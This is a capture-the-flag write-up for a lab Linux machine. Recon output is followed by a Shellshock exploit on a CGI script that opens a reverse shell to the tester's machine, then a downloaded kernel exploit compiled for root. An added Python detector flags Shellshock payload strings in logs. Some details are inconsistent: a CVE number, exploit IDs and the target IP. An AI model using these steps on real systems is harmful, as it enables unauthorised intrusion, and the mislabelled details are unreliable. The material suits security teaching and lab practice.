0day
Machine: Linux
Level: easy
Information gathering
nmap
┌──(root㉿kali)-[~]
└─# nmap -sV -sC -A 10.10.23.50
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 04:28 EDT
Nmap scan report for 10.10.23.50
Host is up (0.28s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 57:20:82:3c:62:aa:8f:42:23:c0:b8:93:99:6f:49:9c (DSA)
| 2048 4c:40:db:32:64:0d:11:0c:ef:4f:b8:5b:73:9b:c7:6b (RSA)
| 256 f7:6f:78:d5:83:52:a6:4d:da:21:3c:55:47:b7:2d:6d (ECDSA)
|_ 256 a5:b4:f0:84:b6:a7:8d:eb:0a:9d:3e:74:37:33:65:16 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: 0day
|_http-server-header: Apache/2.4.7 (Ubuntu)
Aggressive OS guesses: Linux 3.10 - 3.13 (96%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (93%), Sony Android TV (Android 5.0) (93%), Android 5.0 - 6.0.1 (Linux 3.4) (93%), Android 5.1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 296.75 ms 10.11.0.1
2 286.80 ms 10.10.23.50
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.11 seconds
gobuster
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://10.10.23.50/ -w /home/kali/Pentest_dict/directoryDicts/fileName10000.txt
===============================================================
/robots.txt (Status: 200) [Size: 38]
/.htpasswd (Status: 403) [Size: 287]
/.htaccess (Status: 403) [Size: 287]
/.htpasswds (Status: 403) [Size: 288]
Progress: 10288 / 10289 (99.99%)
===============================================================
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://10.10.23.50/ -w /home/kali/Pentest_dict/directoryDicts/top7000.txt
===============================================================
//admin (Status: 301) [Size: 309] [--> http://10.10.23.50/admin/]
//admin/ (Status: 200) [Size: 0]
//robots.txt (Status: 200) [Size: 38]
//index.html (Status: 200) [Size: 3025]
//backup (Status: 301) [Size: 310] [--> http://10.10.23.50/backup/]
//uploads (Status: 301) [Size: 311] [--> http://10.10.23.50/uploads/]
//admin/index.html (Status: 200) [Size: 0]
//cgi-bin/ (Status: 403) [Size: 286]
//backup/ (Status: 200) [Size: 1767]
//cgi-bin (Status: 301) [Size: 311] [--> http://10.10.23.50/cgi-bin/]
//css (Status: 301) [Size: 307] [--> http://10.10.23.50/css/]
//img/ (Status: 200) [Size: 933]
//secret (Status: 301) [Size: 310] [--> http://10.10.23.50/secret/]
//server-status (Status: 403) [Size: 291]
Progress: 6076 / 6984 (87.00%)[ERROR] 2023/07/27 04:34:09 [!] parse "http://10.10.23.50//database/%": invalid URL escape "%"
//img (Status: 301) [Size: 307] [--> http://10.10.23.50/img/]
//secret/ (Status: 200) [Size: 109]
//uploads/ (Status: 200) [Size: 0]
Progress: 6982 / 6984 (99.97%)
===============================================================
Manual verification
Port 80
/robots.txt
Visiting it shows: You really thought it'd be this easy?
/backup
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547
-----END RSA PRIVATE KEY-----
/secret
Turtles?
nikto
┌──(root㉿kali)-[~]
└─# nikto --host http://10.10.23.50
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.23.50
+ Target Hostname: 10.10.23.50
+ Target Port: 80
+ Start Time: 2023-07-27 05:29:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https:/
+ /: The X-Content-Type-Options header is not set. This could allow the user asing-content-type-header/
+ /: Server may leak inodes via ETags, header found with file /, inode: bd1, s
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.54). Apa
+ /cgi-bin/test.cgi: Uncommon header '93e4r0-cve-2014-6278' found, with conten
+ /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
Exploitation
It was found that CVE-2003-1418 may be present. Searching exploitdb turned up https://www.exploit-db.com/exploits/34766, and this script is used to get a shell.
┌──(root㉿kali)-[/home/kali/Desktop]
└─# python2 34900.py payload=reverse rhost=10.10.23.50 lhost=10.11.42.10 lport=1234 pages=/cgi-bin/test.cgi
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/test.cgi
[!] Successfully exploited
[!] Incoming connection from 10.10.23.50
10.10.23.50> whoami
www-data
10.10.23.50> python -c 'import pty;pty.spawn("/bin/bash")'
10.10.23.50> export TERM=xterm-256-color
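A defender-side check for the kind of request used above against /cgi-bin/test.cgi: an added example, not part of the original writeup, that scans Apache combined-format access log lines for the bash function-definition prefix "() {" that Shellshock payloads carry in client-controlled headers. The log lines are constructed for illustration and are not from the target machine.

```python
import re
from typing import List, Optional

# Apache "combined" log format:
# ip ident user [time] "request" status bytes "referer" "user-agent"
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shellshock payloads start with bash's exported-function syntax "() {".
# mod_cgi copies client headers into the CGI environment (User-Agent ->
# HTTP_USER_AGENT, Referer -> HTTP_REFERER), which is why those fields matter.
_SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')


def parse_line(line: str) -> Optional[dict]:
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = _LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_shellshock_attempt(entry: dict) -> bool:
    """True if any client-controlled field carries the "() {" function prefix."""
    return any(_SHELLSHOCK_RE.search(entry[field]) for field in ("ua", "referer", "request"))


def find_shellshock_attempts(lines: List[str]) -> List[dict]:
    """Scan log lines; return the hits, noting whether a CGI script was the target."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry and is_shellshock_attempt(entry):
            entry["targets_cgi"] = "/cgi-bin/" in entry["request"]
            hits.append(entry)
    return hits


# Constructed sample log lines (not from the target machine): a probe against the
# CGI script nikto flagged, a harmless gobuster request, and a probe via Referer.
SAMPLE_LOG = [
    '10.11.42.10 - - [27/Jul/2023:05:29:37 -0400] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" "() { :; }; echo test"',
    '10.11.42.10 - - [27/Jul/2023:04:34:09 -0400] "GET /robots.txt HTTP/1.1" 200 38 "-" "gobuster/3.5"',
    '10.11.42.10 - - [27/Jul/2023:05:29:40 -0400] "GET /index.html HTTP/1.1" 200 3025 "() { :;}; echo test" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} {hit["request"]} cgi={hit["targets_cgi"]}')
```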
Privilege escalation
Check the kernel version
10.10.23.50> uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
Searching exploitdb for this kernel turns up https://www.exploit-db.com/exploits/37292. We start a Python HTTP server on our own machine and transfer the file; since we are running as www-data, we download it into the /tmp/ directory.
www-data@ubuntu:/tmp$ gcc 37292.c
gcc: error trying to exec 'cc1': execvp: No such file or directory
This error means that the gcc compiler cannot execute the program cc1 and reports that the file or directory cannot be found. cc1 is in fact one of GCC's internal components; it translates C source code into intermediate code. Because cc1 or a related component cannot be found on the system, the compiler cannot continue, which produces this error. Our guess is that the system's environment variables are not configured; make sure the directory containing the gcc executable is in the PATH environment variable.
www-data@ubuntu:/tmp$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin   # this command sets the PATH environment variable, exporting /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin as the shell's search path
www-data@ubuntu:/tmp$ gcc 37292.c -o exploit
www-data@ubuntu:/tmp$ ls -l
total 24
-rw-r--r-- 1 www-data www-data 5119 Jul 27 03:07 37292.c
-rwxr-xr-x 1 www-data www-data 13652 Jul 27 17:49 exploit
We run the exploit binary and are now root.
10.10.148.119> ./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
root